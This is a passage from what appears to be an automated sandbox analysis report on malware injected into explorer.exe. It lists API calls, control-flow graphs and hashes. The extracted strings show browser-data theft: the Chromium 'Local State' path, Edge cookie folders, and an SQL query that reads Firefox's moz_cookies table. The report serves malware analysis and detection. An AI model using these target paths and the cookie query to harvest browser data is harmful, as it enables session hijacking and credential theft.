                                                                    • _get_daylight.LIBCMT ref: 0E4E997B
                                                                      • Part of subcall function 0E4E8EEC: _invalid_parameter_noinfo.LIBCMT ref: 0E4E8F00
                                                                    • _get_daylight.LIBCMT ref: 0E4E998C
                                                                      • Part of subcall function 0E4E8E8C: _invalid_parameter_noinfo.LIBCMT ref: 0E4E8EA0
                                                                    • _get_daylight.LIBCMT ref: 0E4E999D
                                                                      • Part of subcall function 0E4E8EBC: _invalid_parameter_noinfo.LIBCMT ref: 0E4E8ED0
                                                                      • Part of subcall function 0E4E4ED0: HeapFree.KERNEL32 ref: 0E4E4EE6
                                                                      • Part of subcall function 0E4E4ED0: GetLastError.KERNEL32 ref: 0E4E4EF8
                                                                    • GetTimeZoneInformation.KERNEL32 ref: 0E4E99C4
                                                                    • WideCharToMultiByte.KERNEL32 ref: 0E4E9A5A
                                                                    • WideCharToMultiByte.KERNEL32 ref: 0E4E9AA6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                    • String ID: ?$Eastern Standard Time$Eastern Summer Time
                                                                    • API String ID: 500310315-688781733
                                                                    • Opcode ID: e7058aed259f57ed55cf1364f6fab453492dfe95792d3d34e5c378728bb1f84b
                                                                    • Instruction ID: 760b40b2ac6bf345eb2bf420496df6fde27c9103670259ae3ead9c41f2fa96b4
                                                                    • Opcode Fuzzy Hash: e7058aed259f57ed55cf1364f6fab453492dfe95792d3d34e5c378728bb1f84b
                                                                    • Instruction Fuzzy Hash: DF51D932610B80CAD715DF26EC8079A77A5FBC8799F880A57EB4957F98EB38C941C740
                                                                    Function 0E457C00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 66stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 885 e457c00-e457c43 SHGetFolderPathA 886 e457c45-e457c47 885->886 887 e457c4c-e457c71 lstrcatA lstrlenA 885->887 888 e457cf5-e457d12 886->888 889 e457cf0 887->889 890 e457c73-e457c7a 887->890 889->888 891 e457c7d-e457ce0 lstrcpyA * 2 lstrcatA lstrlenA lstrcpyA call e457a88 890->891 893 e457ce5-e457cee 891->893 893->889 893->891
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpy$lstrcatlstrlen$FolderPath
                                                                    • String ID: \User Data\Local State
                                                                    • API String ID: 2128322890-3114309041
                                                                    • Opcode ID: 9d976f5a1b73ff1638e19ac43d7beb5d9674bb69198375f30be1eb409822978e
                                                                    • Instruction ID: 9040e944883831ffed17ada27e024efc87e255be9b8d18300f819d3642b11d3a
                                                                    • Opcode Fuzzy Hash: 9d976f5a1b73ff1638e19ac43d7beb5d9674bb69198375f30be1eb409822978e
                                                                    • Instruction Fuzzy Hash: 48211732724A8196DF50CF16E894B9A7365FB88F85F855432EA4E93728DF3CD90AC740
                                                                    Function 0E455ABC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 66stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 876 e455abc-e455aff SHGetFolderPathA 877 e455b01-e455b03 876->877 878 e455b08-e455b2d lstrcatA lstrlenA 876->878 879 e455bb2-e455bcf 877->879 880 e455bad 878->880 881 e455b2f-e455b36 878->881 880->879 882 e455b39-e455b9d lstrcpyA * 2 lstrcatA lstrlenA lstrcpyA call e455944 881->882 884 e455ba2-e455bab 882->884 884->880 884->882
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpy$lstrcatlstrlen$FolderPath
                                                                    • String ID: \User Data\Local State
                                                                    • API String ID: 2128322890-3114309041
                                                                    • Opcode ID: 7a46133316756fc417819ccfd01d3ea184850a32845edf103635da06fe2200fd
                                                                    • Instruction ID: 8ad00a79083416835ffc47665cb1ed659a25013ef5fad815799d3ade653bead5
                                                                    • Opcode Fuzzy Hash: 7a46133316756fc417819ccfd01d3ea184850a32845edf103635da06fe2200fd
                                                                    • Instruction Fuzzy Hash: DC315E32724A8196DF50CF12E894BAA7361F784F85F815422EA4E97728DF3CD90AC740
                                                                    Function 0E455D94 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SHGetFolderPathA.SHELL32 ref: 0E455DB6
                                                                    • SHGetFolderPathA.SHELL32 ref: 0E455E03
                                                                    • lstrcatA.KERNEL32 ref: 0E455E19
                                                                      • Part of subcall function 0E456604: lstrcpyA.KERNEL32 ref: 0E456633
                                                                      • Part of subcall function 0E456604: lstrlenA.KERNEL32 ref: 0E45663E
                                                                      • Part of subcall function 0E456604: lstrcatA.KERNEL32 ref: 0E456662
                                                                      • Part of subcall function 0E456604: lstrcatA.KERNEL32 ref: 0E456674
                                                                      • Part of subcall function 0E456604: FindFirstFileA.KERNEL32 ref: 0E456683
                                                                      • Part of subcall function 0E456604: lstrcpyA.KERNEL32 ref: 0E4566D2
                                                                      • Part of subcall function 0E456604: lstrcatA.KERNEL32 ref: 0E4566E8
                                                                      • Part of subcall function 0E456604: lstrcatA.KERNEL32 ref: 0E4566F7
                                                                      • Part of subcall function 0E456604: lstrcatA.KERNEL32 ref: 0E456709
                                                                      • Part of subcall function 0E456604: FindNextFileA.KERNEL32 ref: 0E45680B
                                                                      • Part of subcall function 0E456604: FindClose.KERNEL32 ref: 0E45681C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$Find$FileFolderPathlstrcpy$CloseFirstNextlstrlen
                                                                    • String ID: .cookie$.txt$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe
                                                                    • API String ID: 4173611902-356491070
                                                                    • Opcode ID: 6579cf1bd4637e43c404cdb8aafef78d2a600bfc4f4f8a7df02b4dce260afe02
                                                                    • Instruction ID: 3431b4ab2ff9399ea195e299580bab0f7fc145b30b66eeec85f99f2e41c35d4b
                                                                    • Opcode Fuzzy Hash: 6579cf1bd4637e43c404cdb8aafef78d2a600bfc4f4f8a7df02b4dce260afe02
                                                                    • Instruction Fuzzy Hash: 25113A73224B85D3EB50DF11F850B9A7365F799305F815527EA8E47A68EB3CD648CB00
                                                                    Function 0E455CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0E457708: GetTempPathA.KERNEL32 ref: 0E457727
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E45773D
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E457746
                                                                      • Part of subcall function 0E457708: wsprintfA.USER32 ref: 0E45788A
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E4578A0
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E4578AD
                                                                    • CopyFileA.KERNEL32 ref: 0E455D1B
                                                                    • DeleteFileA.KERNEL32 ref: 0E455D76
                                                                    Strings
                                                                    • SELECT host, path, isSecure, expiry, name, value, isHttpOnly FROM moz_cookies, xrefs: 0E455D53
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Filelstrcatlstrlen$CopyDeletePathTempwsprintf
                                                                    • String ID: SELECT host, path, isSecure, expiry, name, value, isHttpOnly FROM moz_cookies
                                                                    • API String ID: 4185374037-3522861938
                                                                    • Opcode ID: 43d74f6a088fc3e418d3fd097b07d923dc96b3aea07d2a847afad3ca13e99e41
                                                                    • Instruction ID: e12e7702701fc2d805821a7a1dde1062fbea3cb4978fbb4dd85394e75f7dcd0d
                                                                    • Opcode Fuzzy Hash: 43d74f6a088fc3e418d3fd097b07d923dc96b3aea07d2a847afad3ca13e99e41
                                                                    • Instruction Fuzzy Hash: 59017C73334A8992DB61DB62F854BAA6360FBCA745F805427EE4957A18DF2DC908CB40
                                                                    Function 0E4E4ED0 Relevance: 2.5, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 485612231-0
                                                                    • Opcode ID: 8f9486c2b9ac7041e6348180d4699964ef133c4800ab67ee5ca9e89ed9ba18f9
                                                                    • Instruction ID: 8860562e6391a4d33cd0c50666042360724a30d71621443cd9ed552a3eff877b
                                                                    • Opcode Fuzzy Hash: 8f9486c2b9ac7041e6348180d4699964ef133c4800ab67ee5ca9e89ed9ba18f9
                                                                    • Instruction Fuzzy Hash: 63E01261B1168146EF1CABF3D86837A17E16F85F47F84483AC925AB751EE2C8C454340
                                                                    Function 0E4E4F10 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 4292702814-0
                                                                    • Opcode ID: 558171bcc7c76863372ad7002b378d837f4fc13fab5d06e03d61d6356f178b3d
                                                                    • Instruction ID: 45286eaf795701865ecd9a18c70a56523e2c8f8d9ae32a6df7715b6982f69077
                                                                    • Opcode Fuzzy Hash: 558171bcc7c76863372ad7002b378d837f4fc13fab5d06e03d61d6356f178b3d
                                                                    • Instruction Fuzzy Hash: A1E03961B0664085EE195FA2999037A53905B88FA3F494B2B9D3A87BC0DA6CCC818225